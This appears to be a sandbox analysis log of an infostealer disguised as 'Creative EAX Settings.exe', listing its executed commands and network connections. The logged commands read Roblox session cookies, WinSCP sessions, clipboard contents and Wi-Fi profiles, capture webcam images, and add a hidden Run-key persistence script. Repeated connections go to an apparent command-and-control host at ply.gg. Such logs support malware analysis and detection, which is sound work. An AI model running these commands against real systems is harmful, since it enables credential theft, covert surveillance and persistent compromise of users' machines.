C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\N4gPZPQPQG7R_temp.ps1""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -Command "& { function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace \"root\SecurityCenter2\" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { \"262144\" { $defstatus = \"Up to date\"; $rtstatus = \"Disabled\" } \"262160\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"266240\" { $defstatus = \"Up to date\"; $rtstatus = \"Enabled\" } \"266256\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } \"393216\" { $defstatus = \"Up to date\"; $rtstatus = \"Disabled\" } \"393232\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"393488\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"397312\" { $defstatus = \"Up to date\"; $rtstatus = \"Enabled\" } \"397328\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } \"397584\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } default { $defstatus = \"Unknown\"; $rtstatus = \"Unknown\" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct }"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -Command "& {powershell Get-Clipboard}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe" -invalid youcam,cyberlink,google -frame 10 -outfile C:\Users\Admin\AppData\Local\Temp\33sN7DhO25fCsoJ0peG9\System\cam.5164_Admin.jpg"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -Command "& {netsh wlan show profile}"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\N4gPZPQPQG7R_temp.ps1"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Clipboard
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" wlan show profile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\snapshot.exe" /T C:\Users\Admin\AppData\Local\Temp\33sN7DhO25fCsoJ0peG9\System\cam.5164_Admin"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_WSlAND /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_WSlAND.vbs /f"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_WSlAND.vbs\"""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_WSlAND /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_WSlAND.vbs /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_WSlAND.vbs\""
C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_WSlAND.vbs
C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe
"C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAIAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1480 --field-trial-handle=1772,5064392763959393394,8550773419608691522,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 6.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 2.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.ip.gl.ply.gg | udp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | 114.110.16.96.in-addr.arpa | udp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | 6.173.189.20.in-addr.arpa | udp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| N/A | 127.0.0.1:53059 | tcp | |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 34.117.237.239:443 | contile.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 44.236.180.36:443 | shavar.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| N/A | 127.0.0.1:53065 | tcp | |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | aus5.mozilla.org | udp |
| US | 35.244.181.201:443 | aus5.mozilla.org | tcp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | 201.181.244.35.in-addr.arpa | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.160.144.191:443 | prod.content-signature-chains.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| GB | 88.221.134.155:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 142.250.180.14:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | 155.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r1---sn-4g5e6nzl.gvt1.com | udp |
| US | 8.8.8.8:53 | r1.sn-4g5e6nzl.gvt1.com | udp |
| US | 8.8.8.8:53 | r1.sn-4g5e6nzl.gvt1.com | udp |
| GB | 142.250.180.14:443 | redirector.gvt1.com | udp |
| DE | 74.125.11.102:443 | r1.sn-4g5e6nzl.gvt1.com | tcp |
| US | 8.8.8.8:53 | 14.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.11.125.74.in-addr.arpa | udp |
| DE | 74.125.11.102:443 | r1.sn-4g5e6nzl.gvt1.com | udp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.117.121.53:443 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.117.121.53:443 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.117.121.53:443 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.117.121.53:443 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.200.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.200.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 4.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.179.238:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | plus.l.google.com | udp |
| US | 8.8.8.8:53 | plus.l.google.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| GB | 172.217.16.238:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 172.217.16.238:443 | encrypted-tbn0.gstatic.com | tcp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| GB | 172.217.16.238:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 172.217.16.238:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.179.238:443 | plus.l.google.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| GB | 172.217.16.238:443 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | yopmail.com | udp |
| GB | 87.98.250.141:443 | yopmail.com | tcp |
| US | 8.8.8.8:53 | yopmail.com | udp |
| US | 8.8.8.8:53 | yopmail.com | udp |
| GB | 87.98.250.141:443 | yopmail.com | tcp |
| GB | 87.98.250.141:443 | yopmail.com | tcp |
| GB | 87.98.250.141:443 | yopmail.com | tcp |
| US | 8.8.8.8:53 | 141.250.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.187.250.142.in-addr.arpa | udp |
| GB | 87.98.250.141:443 | yopmail.com | tcp |
| GB | 87.98.250.141:443 | yopmail.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 142.250.178.2:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.178.250.142.in-addr.arpa | udp |
| GB | 142.250.178.2:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.200.46:443 | fundingchoicesmessages.google.com | tcp |
| US | 8.8.8.8:53 | www3.l.google.com | udp |
| US | 8.8.8.8:53 | www3.l.google.com | udp |
| GB | 142.250.200.46:443 | www3.l.google.com | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| GB | 216.58.212.193:443 | lh3.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | googlehosted.l.googleusercontent.com | udp |
| US | 8.8.8.8:53 | 46.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.212.58.216.in-addr.arpa | udp |
| GB | 216.58.212.193:443 | googlehosted.l.googleusercontent.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | udp |
| GB | 142.250.200.4:443 | www.google.com | tcp |
| GB | 142.250.200.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 1.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.googletagservices.com | udp |
| GB | 142.250.179.226:443 | www.googletagservices.com | tcp |
| US | 8.8.8.8:53 | www.googletagservices.com | udp |
| GB | 142.250.179.226:443 | www.googletagservices.com | tcp |
| US | 8.8.8.8:53 | www.googletagservices.com | udp |
| GB | 142.250.179.226:443 | www.googletagservices.com | udp |
| US | 8.8.8.8:53 | 226.179.250.142.in-addr.arpa | udp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | yopmail.com | udp |
| US | 8.8.8.8:53 | www.filemail.com | udp |
| NL | 178.21.23.181:443 | www.filemail.com | tcp |
| US | 8.8.8.8:53 | www.filemail.com | udp |
| US | 8.8.8.8:53 | www.filemail.com | udp |
| US | 8.8.8.8:53 | 181.23.21.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | analytics.filemail.com | udp |
| NL | 178.21.23.181:443 | www.filemail.com | tcp |
| NL | 178.21.23.181:443 | www.filemail.com | tcp |
| NL | 178.21.23.181:443 | www.filemail.com | tcp |
| NL | 178.21.23.181:443 | www.filemail.com | tcp |
| NL | 178.21.23.181:443 | www.filemail.com | tcp |
| NL | 20.82.124.160:443 | analytics.filemail.com | tcp |
| US | 8.8.8.8:53 | api-001.filemail.com | udp |
| US | 8.8.8.8:53 | api-001.filemail.com | udp |
| US | 8.8.8.8:53 | 160.124.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.187.250.142.in-addr.arpa | udp |
| GB | 142.250.178.2:443 | googleads.g.doubleclick.net | tcp |
| GB | 142.250.178.2:443 | googleads.g.doubleclick.net | udp |
| GB | 142.250.200.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| GB | 172.217.169.35:443 | www.google.co.uk | tcp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| GB | 142.250.200.4:443 | www.google.com | udp |
| GB | 172.217.169.35:443 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | 35.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3002.filemail.com | udp |
| US | 8.8.8.8:53 | ip.3002.filemail.com | udp |
| NO | 193.30.119.102:443 | ip.3002.filemail.com | tcp |
| US | 8.8.8.8:53 | ip.3002.filemail.com | udp |
| N/A | 127.0.0.1:56666 | tcp | |
| US | 8.8.8.8:53 | 102.119.30.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.filemail.com | udp |
| US | 8.8.8.8:53 | widget.intercom.io | udp |
| DE | 13.32.27.114:443 | widget.intercom.io | tcp |
| US | 8.8.8.8:53 | widget.intercom.io | udp |
| N/A | 127.0.0.1:56666 | tcp | |
| US | 8.8.8.8:53 | widget.intercom.io | udp |
| DE | 13.32.27.114:443 | widget.intercom.io | udp |
| US | 8.8.8.8:53 | js.intercomcdn.com | udp |
| DE | 18.66.147.49:443 | js.intercomcdn.com | tcp |
| US | 8.8.8.8:53 | js.intercomcdn.com | udp |
| DE | 18.66.147.49:443 | js.intercomcdn.com | tcp |
| US | 8.8.8.8:53 | js.intercomcdn.com | udp |
| DE | 18.66.147.49:443 | js.intercomcdn.com | udp |
| US | 8.8.8.8:53 | 114.27.32.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.147.66.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api-iam.intercom.io | udp |
| US | 52.3.143.140:443 | api-iam.intercom.io | tcp |
| US | 8.8.8.8:53 | api-iam.intercom.io | udp |
| US | 8.8.8.8:53 | api-iam.intercom.io | udp |
| US | 8.8.8.8:53 | nexus-websocket-a.intercom.io | udp |
| US | 8.8.8.8:53 | nexus-websocket-a.intercom.io | udp |
| US | 34.237.73.95:443 | nexus-websocket-a.intercom.io | tcp |
| US | 8.8.8.8:53 | nexus-websocket-a.intercom.io | udp |
| US | 8.8.8.8:53 | 140.143.3.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.73.237.34.in-addr.arpa | udp |
| N/A | 127.0.0.1:56666 | tcp | |
| N/A | 127.0.0.1:56666 | tcp | |
| US | 8.8.8.8:53 | id.google.com | udp |
| JP | 142.251.42.131:443 | id.google.com | tcp |
| US | 8.8.8.8:53 | id.google.com | udp |
| US | 8.8.8.8:53 | id.google.com | udp |
| JP | 142.251.42.131:443 | id.google.com | tcp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 142.250.180.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| JP | 142.251.42.131:443 | id.google.com | udp |
| GB | 142.250.180.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 142.250.180.22:443 | i.ytimg.com | tcp |
| GB | 142.250.180.22:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | 131.42.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 216.58.212.238:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| GB | 216.58.212.238:443 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | 238.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | processhacker.sourceforge.io | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 172.64.148.49:443 | processhacker.sourceforge.io | tcp |
| US | 8.8.8.8:53 | prwebsecure.sourceforge.io.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | prwebsecure.sourceforge.io.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | 16.ip.gl.ply.gg | udp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 172.64.148.49:443 | prwebsecure.sourceforge.io.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | sourceforge.net | udp |
| US | 172.64.150.145:443 | sourceforge.net | tcp |
| US | 8.8.8.8:53 | sourceforge.net | udp |
| US | 8.8.8.8:53 | sourceforge.net | udp |
| US | 172.64.150.145:443 | sourceforge.net | udp |
| US | 8.8.8.8:53 | 49.148.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.150.64.172.in-addr.arpa | udp |
| GB | 142.250.178.2:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| GB | 142.250.200.6:443 | static.doubleclick.net | tcp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| GB | 142.250.179.234:443 | jnn-pa.googleapis.com | tcp |
| GB | 142.250.178.2:443 | googleads.g.doubleclick.net | udp |
| GB | 142.250.200.6:443 | static.doubleclick.net | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| GB | 142.250.179.234:443 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | 6.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| GB | 142.250.179.234:443 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| BE | 74.125.206.157:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| BE | 74.125.206.157:443 | stats.g.doubleclick.net | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | 157.206.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| N/A | 127.0.0.1:56666 | tcp | |
| N/A | 127.0.0.1:56666 | tcp | |
| US | 172.64.150.145:443 | sourceforge.net | tcp |
| US | 172.64.150.145:443 | sourceforge.net | udp |
| US | 8.8.8.8:53 | a.fsdn.com | udp |
| US | 172.64.147.47:443 | a.fsdn.com | tcp |
| US | 172.64.147.47:443 | a.fsdn.com | tcp |
| US | 172.64.147.47:443 | a.fsdn.com | tcp |
| US | 8.8.8.8:53 | a.fsdn.com.cdn.cloudflare.net | udp |
| US | 172.64.147.47:443 | a.fsdn.com.cdn.cloudflare.net | tcp |
| US | 172.64.147.47:443 | a.fsdn.com.cdn.cloudflare.net | tcp |
| US | 172.64.147.47:443 | a.fsdn.com.cdn.cloudflare.net | tcp |
| US | 172.64.147.47:443 | a.fsdn.com.cdn.cloudflare.net | tcp |
| US | 172.64.147.47:443 | a.fsdn.com.cdn.cloudflare.net | tcp |
| US | 8.8.8.8:53 | a.fsdn.com.cdn.cloudflare.net | udp |
